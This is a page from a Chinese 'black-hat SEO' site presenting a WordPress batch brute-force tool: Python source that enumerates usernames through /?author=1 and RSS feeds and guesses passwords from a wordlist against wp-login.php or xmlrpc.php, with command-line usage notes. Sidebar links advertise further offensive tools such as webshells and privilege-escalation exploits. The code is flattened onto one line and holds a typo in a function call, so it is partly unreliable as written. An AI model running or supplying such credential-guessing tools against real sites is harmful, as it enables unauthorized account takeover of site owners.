黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

wordperss批量爆破工具

  1.参数化操作

  2.两种暴力破解方式,通过wp-login模拟发包登录或者采用xmlrpc.php post数据包均可。

  3.自动获取用户名功能。/?author=1 还有rss 两种方式获取。由于wp主题众多,匹配正则太少,所以会不准。配合百度爬虫试了一下效果,准确率70%。

  4.同目录下新建pass.txt 就可以跑密码啦。

  代码如下:

  #!/usr/bin/env python#coding:utf-8__author__=’mtfly’import requestsimport stringimport timeimport refrom optparse import OptionParserdef crack_xmlrpc(username, password, url): crack_url=url + “/xmlrpc.php” #print crack_url post=”’ wp.getUsersBlogs ”’ + username + ”’ ”’ + password + ”’ ”’ headers={ ‘UserAgent’: ‘Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)’, ‘Referer’: crack_url } try: res=requests.post(url=crack_url, data=post, headers=headers, timeout=5).content #print “ok” except Exception, e: print “error”, e else: if ‘405‘ in res: print “XML-RPC has been disabled. Please use the wp-admin.php” elif “faultCode” in res: print “The password is not:”, password elif “isAdmin” in res: print “/nThe password is “, password exit()def crack_wp_login(username, password, url): crack_url=url + “/wp-login.php” #print crack_url headers={ ‘UserAgent’: ‘Mozilla/5.0 wordperss批量爆破工具 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)’, ‘Content-Type’: ‘application/x-www-form-urlencoded’ } post={‘log’: username, ‘pwd’: password} try: res=requests.post(url=crack_url, data=post, headers=headers, timeout=5).content except Exception, e: print “error”, e else: if ‘lostpassword’ in res: print “The password is not:”, password elif “welcome-panel” in res: print “/nThe password is “, password exit()def get_author(url): get_url0=url + “/?feed=rss2” get_url1=url + “/?author=1” headers={ ‘UserAgent’: ‘Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)’ } #print get_url try: res0=requests.get(get_url0) res1=requests.get(get_url1) html0=res0.content html1=res1.content s0=re.findall(‘‘,html0) s1=re.findall(‘(.*?)/s’,html1) if len(s1)==0: # print “null” # print res.url s1=re.findall(‘author/(.*?)/’, res1.url) s=s0 +s1 print “The Username maybe:” for i in list(set(s)): print i except Exception, e: print e p=OptionParser()p.add_option(‘-u’, ‘–url’, type=”string”, help=’Input the url’)p.add_option(‘-a’, ‘–admin’,default=”admin”, type=”string”, help=’Input the username’)p.add_option(‘-g’, ‘–getauthor’,default=False, action=”store_true”, help=’Get admin/’username’)p.add_option(‘-w’, ‘–crack_wp_login’,default=False, action=”store_true”, help=’Crack by wp-login’)p.add_option(‘-x’, ‘–crack_xmlrpc’,default=False, action=”store_true”, help=’Crack by xmlrpc’)options, args=p.parse_args()url=options.url admin=options.admin author=options.getauthor w=options.crack_wp_login x=options.crack_xmlrpc# url=”http://mtfly.net”# url=”http://127.0.0.1/wp/”print urlif author: get_author(url) exit()f=open(“pass.txt”, “r”)for line in f: #print line.strip() if w: crack_wp_login(admin, line.strip(), url) if x: crack_xmlrpr(admin, line.strip(), url)f.close</p> </p> <p><p>  新建pass.txt并且添加测试密码。</p> </p> <p><p>  -u 后面接wp的url 记得带上http://</p> </p> <p><p>  -a 后面跟用户名 默认是admin</p> </p> <p><p>  -g 自动判断管理员用户名,准确率较低。获取用户名后自动退出。</p> </p> <p><p>  -w 用 /wp-login.php 模拟后台网页登录</p> </p> <p><p>  -x 用 /xmlrpc.php接口 POST登录</p></p> </article> <div class="post-copyright">未经允许不得转载:<a href="http://www.otkseo.com">黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程</a> » <a href="http://www.otkseo.com/tools9557.html">wordperss批量爆破工具</a></div> <div class="action-share"><div class="bdsharebuttonbox"> <span>分享到:</span> <a class="bds_qzone" data-cmd="qzone" title="分享到QQ空间"></a> <a class="bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a> <a class="bds_weixin" data-cmd="weixin" title="分享到微信"></a> <a class="bds_tqq" data-cmd="tqq" title="分享到腾讯微博"></a> <a class="bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a> <a class="bds_bdhome" data-cmd="bdhome" title="分享到百度新首页"></a> <a class="bds_tqf" data-cmd="tqf" title="分享到腾讯朋友"></a> <a class="bds_youdao" data-cmd="youdao" title="分享到有道云笔记"></a> <a class="bds_more" data-cmd="more">更多</a> <span>(</span><a class="bds_count" data-cmd="count" title="累计分享0次">0</a><span>)</span> </div> <script> window._bd_share_config = { common: { "bdText" : "", "bdMini" : "2", "bdMiniList" : false, "bdPic" : "", "bdStyle" : "0", "bdSize" : "24" }, share: [{ bdCustomStyle: "http://www.otkseo.com/wp-content/themes/xiu72/css/share.css" }] } with(document)0[(getElementsByTagName("head")[0]||body).appendChild(createElement("script")).src="http://bdimg.share.baidu.com/static/api/js/share.js?cdnversion="+~(-new Date()/36e5)]; </script></div> <div class="article-tags">标签:<a href="http://www.otkseo.com/tag/wordperss%e6%89%b9%e9%87%8f%e7%88%86%e7%a0%b4%e5%b7%a5%e5%85%b7" rel="tag">wordperss批量爆破工具</a></div> <nav class="article-nav"> <span class="article-nav-prev">上一篇<br><a href="http://www.otkseo.com/tools9554.html" rel="prev">BrowserGhost-抓取浏览器密码的工具</a></span> <span class="article-nav-next">下一篇<br><a href="http://www.otkseo.com/tools9559.html" rel="next">通用文件扫描器scan_bak.py</a></span> </nav> <div class="relates relates-textcol2"><div class="title"><h3>相关推荐</h3></div><ul><li><a href="http://www.otkseo.com/tools10727.html">宝塔Linux面板7.6.0 开心版破解版 一键安装脚本分享</a></li><li><a href="http://www.otkseo.com/tools10721.html">sqlmap图形化界面工具|sqlmap GUI</a></li><li><a href="http://www.otkseo.com/tools9724.html">构造XSS-CSRF代码+Discuz添加用户EXP</a></li><li><a href="http://www.otkseo.com/tools9722.html">2012ASP大马——不灭之魂</a></li><li><a href="http://www.otkseo.com/tools9718.html">MSSQLi-DUET之MSSQLSQL注入工具</a></li><li><a href="http://www.otkseo.com/tools9715.html">黑帽收割机shell软件</a></li><li><a href="http://www.otkseo.com/tools9708.html">Windows提权漏洞库+EXP/POC工具</a></li><li><a href="http://www.otkseo.com/tools9705.html">seo黑帽收割机</a></li></ul></div> </div> </div> <div class="sidebar"> </div></section> <div class="branding branding-black"> <div class="container"> <h2>黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程</h2> <a target="blank" class="btn btn-lg" href="http://www.otkseo.com">不做韭菜</a><a target="blank" class="btn btn-lg" href="http://www.otkseo.com">坚决不做韭菜</a> </div> </div> <footer class="footer"> <div class="container"> <p>© 1998-2021   <a href="http://www.otkseo.com">黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程</a>   <a href="http://www.otkseo.com/sitemap.xml">网站地图</a> </p> </div> </footer> <div class="rollbar rollbar-rm"><ul><li><a target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin=24825022&site=qq&menu=yes"><i class="fa fa-qq"></i><span>QQ咨询</span></a><h6>QQ咨询<i></i></h6></li><li class="rollbar-totop"><a href="javascript:(TBUI.scrollTo());"><i class="fa fa-angle-up"></i><span>回顶</span></a><h6>回顶部<i></i></h6></li></ul></div> <script>window.TBUI={"www":"http:\/\/www.otkseo.com","uri":"http:\/\/www.otkseo.com\/wp-content\/themes\/icu","ver":"7.2","roll":"1 2","ajaxpager":"5","fullimage":false,"url_rp":"http:\/\/www.otkseo.com\/us","captcha":0,"captcha_appid":"","captcha_comment":1}</script> <script type='text/javascript' src='//apps.bdimg.com/libs/bootstrap/3.2.0/js/bootstrap.min.js?ver=7.2' id='bootstrap-js'></script> <script type='text/javascript' src='http://www.otkseo.com/wp-content/themes/icu/js/loader.js?ver=7.2' id='_loader-js'></script> <script type='text/javascript' src='http://www.otkseo.com/wp-includes/js/wp-embed.min.js?ver=5.8.1' id='wp-embed-js'></script> <script> (function(){ var bp = document.createElement('script'); bp.src = '//push.zhanzhang.baidu.com/push.js'; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script></body> </html>